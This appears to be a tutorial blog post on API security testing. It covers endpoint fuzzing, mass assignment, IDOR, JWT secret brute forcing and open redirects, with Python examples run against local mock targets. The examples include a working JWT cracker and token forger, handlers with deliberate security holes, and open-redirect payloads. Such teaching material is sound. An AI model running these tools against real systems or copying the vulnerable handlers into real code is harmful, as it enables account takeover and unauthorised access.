API Testing

Introduction to API

API stands for Application Programming Interface. It acts as a middleman between a client and a server: the client sends a request, the API delivers it to the server, and the server's data comes back through the same interface.

Basically it acts as a medium of communication between two entities.

Types of API
  1. REST API
  2. SOAP API
Properties of a secure API
  1. An API should provide the expected output for a given input.
  2. Inputs should fall within a defined range, and values outside the range must be rejected.
  3. Any empty or null input must be rejected where it is not acceptable.
  4. Incorrectly sized input (too long, too short, wrong type) must be rejected.
API vulnerabilities

Some examples of API vulnerabilities are:

  1. Mass Assignment
  2. JWT (JSON Web Token) brute forcing
  3. JSON hijacking
  4. Command Injection
  5. Open Redirect
  6. SQL injection
  7. Hidden (undocumented) API endpoints, found by fuzzing
  8. IDOR
Tools that can be used for API testing:
  1. Postman
  2. Burp Suite
API Recon

Read the API documentation thoroughly. It not only helps you understand the API, it also tells you what response to expect for each type of request, which saves time and effort during testing.

Step 1: Decide your target.

Step 2: Start finding subdomains; APIs often live on hosts such as api.target.com.

Step 3: Use ProgrammableWeb (an API directory) to look up public documentation for the target.

Step 4: Browse the application manually through Burp Suite and note every API request the client makes.

Finding hidden APIs

Let's say you have an API at:

aayushforinfosec.wordpress.com/api/v1

So our target is /api/v1. Now we have to fuzz this path to discover endpoints that are not documented and test them for security vulnerabilities.

Fuzzing here is just brute forcing with a wordlist: each word is appended to the base path and the response status and size are compared. This can be done with Burp Suite's Intruder.

Try to create your own wordlist that is related to the target (product names, object names seen in the documented endpoints, version numbers). It also helps in hidden API enumeration.
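The fuzzing loop described above, as an added example (not code from the original post): it appends each wordlist entry to the base path, records the status code and body length of every response, and keeps anything that is not a plain 404. Because it has to run offline, the target is a constructed local HTTP server standing in for /api/v1; the routes it serves and the wordlist are assumptions made for the example.

```python
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


# Constructed stand-in for the target: only three routes exist under /api/v1.
# Everything else answers 404, which is the noise the fuzzer must filter out.
class FakeApi(BaseHTTPRequestHandler):
    ROUTES = {
        "/api/v1/users": (200, b'[{"id":1,"username":"demo"}]'),
        "/api/v1/admin": (401, b'{"error":"authentication required"}'),
        "/api/v1/debug": (403, b'{"error":"forbidden"}'),
    }

    def do_GET(self):
        status, body = self.ROUTES.get(self.path, (404, b'{"error":"not found"}'))
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the fuzz run quiet


def start_fake_api():
    """Start the constructed target on a random localhost port; return (server, base URL)."""
    server = HTTPServer(("127.0.0.1", 0), FakeApi)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


def probe(url):
    """GET one URL and return (status, body_length). A 4xx/5xx is still an answer."""
    req = urllib.request.Request(url, headers={"User-Agent": "api-fuzz/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as e:
        return e.code, len(e.read())


def fuzz_paths(base_url, wordlist, ignore_status=(404,)):
    """Append each word to base_url and keep every path whose status is not ignored.

    401 and 403 count as hits: the route exists, it just wants credentials.
    """
    hits = {}
    for word in wordlist:
        status, length = probe(f"{base_url.rstrip('/')}/{word}")
        if status not in ignore_status:
            hits[word] = (status, length)
    return hits


# Constructed wordlist: generic API words plus target-specific guesses.
WORDLIST = ["users", "admin", "debug", "login", "config", "v2", "health", "internal"]

if __name__ == "__main__":
    server, base = start_fake_api()
    try:
        for path, (status, length) in fuzz_paths(f"{base}/api/v1", WORDLIST).items():
            print(f"{status} {length:>5}  /api/v1/{path}")
    finally:
        server.shutdown()
```

Against a real target, also compare body lengths: some APIs return 200 for every path with a generic error page, and then the length, not the status, is what separates real endpoints from noise.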

Mass Assignment

This type of vulnerability occurs when the server copies every parameter from the request onto an internal object, so adding extra parameters to the request, or altering existing ones, gives you some extra benefit the developer never intended to expose.

For example: you are registering on a website as a normal user by submitting your username and password, and you intercept the request with these parameters:

username=demo&password=infosec

Now you add an extra parameter that might give you admin privileges:

username=demo&password=infosec&admin=true

If the server binds the whole request body to the user object without an allow-list of fields, submitting the altered request registers you as an admin. The same test applies to JSON bodies: add "admin": true, "role": "admin" or similar keys and see whether they are reflected in the created object.
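The registration handler described above, as an added example (not code from the original post), with the vulnerable and the hardened version side by side. The in-memory user store, the field names and the request bodies are constructed for the example; the fix is an allow-list of the fields a self-registration request may set.

```python
import hashlib
import json
import os
from urllib.parse import parse_qs

# Constructed in-memory user store standing in for the application's database.
USERS = {}

# Fields a self-registration request is allowed to set. Everything else
# (admin, verified, balance, ...) is server-controlled.
ALLOWED_REGISTRATION_FIELDS = {"username", "password"}


def parse_body(body, content_type="application/x-www-form-urlencoded"):
    """Parse a form-encoded or JSON request body into a flat dict of strings."""
    if content_type.startswith("application/json"):
        return {k: str(v) for k, v in json.loads(body).items()}
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def hash_password(password):
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + ":" + digest.hex()


def _store(user):
    """Normalise the admin flag the way a typical model would and persist the record."""
    user["admin"] = str(user["admin"]).lower() in ("true", "1")
    user["password"] = hash_password(user["password"])
    USERS[user["username"]] = user
    return user


def register_vulnerable(body, content_type="application/x-www-form-urlencoded"):
    """Vulnerable: every submitted field is copied onto the new record,
    so admin=true from the client overrides the server's default."""
    user = {"admin": False, "verified": False}
    user.update(parse_body(body, content_type))  # mass assignment happens here
    return _store(user)


def register_safe(body, content_type="application/x-www-form-urlencoded"):
    """Hardened: only allow-listed fields are taken from the request; the rest
    are ignored (logging them is a good idea, since they signal probing)."""
    submitted = parse_body(body, content_type)
    user = {"admin": False, "verified": False}
    user.update({k: v for k, v in submitted.items() if k in ALLOWED_REGISTRATION_FIELDS})
    return _store(user)


if __name__ == "__main__":
    attacker = register_vulnerable("username=demo&password=infosec&admin=true")
    print("vulnerable handler -> admin =", attacker["admin"])
    normal = register_safe('{"username":"demo2","password":"infosec","admin":true}',
                           "application/json")
    print("hardened handler   -> admin =", normal["admin"])
```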

IDOR(Insecure Direct Object Reference)

IDOR is an access-control bug: the application takes an object identifier (a user ID, order number, file name) from the user and returns that object without checking that the requesting user is actually allowed to see it.

For example: suppose the request is "abcd.com/user=1", which returns data for user 1, the account we are logged in as. If we change it to "abcd.com/user=2" and receive user 2's data, the endpoint is vulnerable, because our session should only be able to read our own record.
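The check a tester performs for the case above, as an added example (not code from the original post): two session tokens, each belonging to a different user, are used to request the other user's record. The user table, tokens and handler names are constructed for the example; the hardened handler adds the ownership check the vulnerable one lacks.

```python
# Constructed users and sessions standing in for the application's state.
USERS = {
    1: {"id": 1, "username": "alice", "email": "alice@example.com", "admin": False},
    2: {"id": 2, "username": "bob", "email": "bob@example.com", "admin": False},
    3: {"id": 3, "username": "root", "email": "root@example.com", "admin": True},
}
SESSIONS = {"tok-alice": 1, "tok-bob": 2, "tok-root": 3}


class Unauthorized(Exception):
    """No valid session (HTTP 401)."""


class Forbidden(Exception):
    """Valid session, but not allowed to touch this object (HTTP 403)."""


def current_user(token):
    try:
        return SESSIONS[token]
    except KeyError:
        raise Unauthorized from None


def get_user_vulnerable(token, user_id):
    """Vulnerable: authenticates the caller but never checks that the
    requested object belongs to them (the classic IDOR)."""
    current_user(token)
    return USERS[user_id]


def get_user_safe(token, user_id):
    """Hardened: the object is returned only to its owner or to an admin."""
    caller = current_user(token)
    if caller != user_id and not USERS[caller]["admin"]:
        raise Forbidden(f"user {caller} may not read user {user_id}")
    return USERS[user_id]


def idor_probe(handler, token, own_id, target_id):
    """Tester's view: does a session for own_id receive target_id's record?

    Returns True when data leaked (vulnerable), False when access was refused.
    """
    try:
        record = handler(token, target_id)
    except Forbidden:
        return False
    return record["id"] == target_id and target_id != own_id


if __name__ == "__main__":
    for name, handler in (("vulnerable", get_user_vulnerable), ("safe", get_user_safe)):
        leaked = idor_probe(handler, "tok-alice", own_id=1, target_id=2)
        print(f"{name:10s}: alice reading bob ->", "LEAK" if leaked else "denied")
```

Run the probe in both directions (alice reading bob, bob reading alice) and with the lowest-privileged account you have; an endpoint that only checks "is logged in" will fail every one of them.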

SQL Injection

This is the type of vulnerability where the API accepts user data blindly and places it inside a database query. If the data contains SQL syntax (a quote, OR, UNION, a comment sequence), it is executed as part of the query and can return rows the user was never meant to see, or modify the database.

Command Injection

In this case the attacker sends data containing operating-system command syntax (for example a semicolon, a pipe, or backticks followed by a command) in a parameter that the server passes to a shell, checks whether the command executed, and if it did, tries to exploit it.

JWT brute forcing

Whenever you log in to a website it may give you an authorization token in the form of a JWT (JSON Web Token). When the token is signed with an HMAC algorithm such as HS256, the signature depends only on a shared secret. You can try to recover that secret by brute forcing it against a wordlist or a character set; once you have it, you can mint your own tokens with whatever claims you like and break the authentication.

To decode and understand any JWT, use jwt.io.
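The attack described above, as an added example (not code from the original post): a minimal HS256 signer and verifier built on the standard library, a dictionary attack on a captured token, and the forged admin token that follows. The token, the secret "infosec" and the wordlist are constructed for the example. Only HMAC-signed tokens (HS256/384/512) are attackable this way; RS256 or ES256 tokens are signed with a private key and there is no secret to guess.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: dict, secret: str) -> str:
    """Build header.payload.signature with HS256 (compact JSON, as real libraries do)."""
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [b64url(json.dumps(header, separators=(",", ":")).encode()),
             b64url(json.dumps(payload, separators=(",", ":")).encode())]
    signing_input = ".".join(parts)
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_hs256(token: str, secret: str) -> bool:
    head, body, sig = token.split(".")
    expected = hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))


def decode_payload(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def brute_force_secret(token: str, candidates):
    """Dictionary attack: the first candidate whose HMAC matches the signature is the secret."""
    for candidate in candidates:
        if verify_hs256(token, candidate):
            return candidate
    return None


def forge_token(token: str, secret: str, **new_claims) -> str:
    """Re-sign the captured token's claims, with changes, using the recovered secret."""
    claims = decode_payload(token)
    claims.update(new_claims)
    return sign_hs256(claims, secret)


# Constructed: a token as the login endpoint might issue it, signed with a weak secret.
CAPTURED_TOKEN = sign_hs256({"sub": "demo", "admin": False}, "infosec")

# Constructed wordlist; real runs use rockyou-style lists or a character-set mask.
WORDLIST = ["password", "secret", "123456", "changeme", "infosec", "letmein"]

if __name__ == "__main__":
    secret = brute_force_secret(CAPTURED_TOKEN, WORDLIST)
    print("recovered secret:", secret)
    if secret:
        admin = forge_token(CAPTURED_TOKEN, secret, admin=True)
        print("forged token verifies:", verify_hs256(admin, secret), decode_payload(admin))
```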

Open-Redirect

In this type of vulnerability the attacker supplies a payload (generally a URL) in a parameter the API uses as a redirect target, for example a "next" or "returnUrl" value, so that the API sends the victim to an attacker-chosen location instead of one on the legitimate site.

For example: if someone puts google.com in the redirect parameter at the end of the API request and the server does not validate it, the response redirects the victim to the Google page. A real attacker would use a phishing page that looks like the target, since the link the victim clicked still started with the trusted domain.
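A redirect-target validator, as an added example (not code from the original post), covering the bypasses a tester tries after the plain "https://evil.com" case: scheme-relative "//evil.com", backslashes that browsers treat as slashes, credentials before an "@", look-alike subdomains, and non-HTTP schemes. The allowed host is the page's own example domain and is an assumption for the example; the handler names are constructed.

```python
from urllib.parse import urlsplit

# Constructed allow-list: only the page's example host may be a redirect destination.
ALLOWED_HOSTS = {"aayushforinfosec.wordpress.com"}


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """Accept a same-site relative path or an absolute http(s) URL on an allowed host."""
    if not target or any(ord(c) < 33 for c in target):   # whitespace / control chars
        return False
    if "\\" in target:        # browsers treat \ as /, so "/\evil.com" becomes "//evil.com"
        return False
    parts = urlsplit(target)
    if parts.scheme:
        if parts.scheme not in ("http", "https"):        # javascript:, data:, ...
            return False
        # hostname strips any "user@" prefix, so "https://good@evil.com" yields evil.com
        return bool(parts.hostname) and parts.hostname.lower() in allowed_hosts
    if parts.netloc:          # scheme-relative "//evil.com"
        return False
    # "///evil.com" also resolves to a host in browsers, so reject anything starting "//"
    return target.startswith("/") and not target.startswith("//")


def redirect_vulnerable(next_param):
    """Vulnerable: whatever the client sent becomes the Location header."""
    return {"status": 302, "Location": next_param}


def redirect_safe(next_param, fallback="/"):
    """Hardened: unvalidated targets fall back to the site root."""
    return {"status": 302, "Location": next_param if is_safe_redirect(next_param) else fallback}


if __name__ == "__main__":
    # Constructed probe list: the payloads a tester would feed the redirect parameter.
    for payload in ["/account", "https://evil.com", "//evil.com", "/\\evil.com",
                    "https://aayushforinfosec.wordpress.com@evil.com/",
                    "https://aayushforinfosec.wordpress.com.evil.com", "javascript:alert(1)"]:
        print(f"{payload!r:55} -> {redirect_safe(payload)['Location']}")
```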

Checklist for API Testing
  1. Fuzz Testing
    • Arithmetic operations (negative numbers, zero, very large values, overflows)
    • Brute forcing with a wordlist for hidden API endpoints
    • Sensitive data exposure in responses and error messages
  2. Injection
    • Command injection: commands that execute on the server
    • Blind injections (time-based or out-of-band, where no output is returned)
    • SQL injection
  3. Changing HTTP methods (GET to POST, PUT, DELETE, PATCH) on each endpoint
  4. Authentication and authorization testing (JWT handling, IDOR, mass assignment)
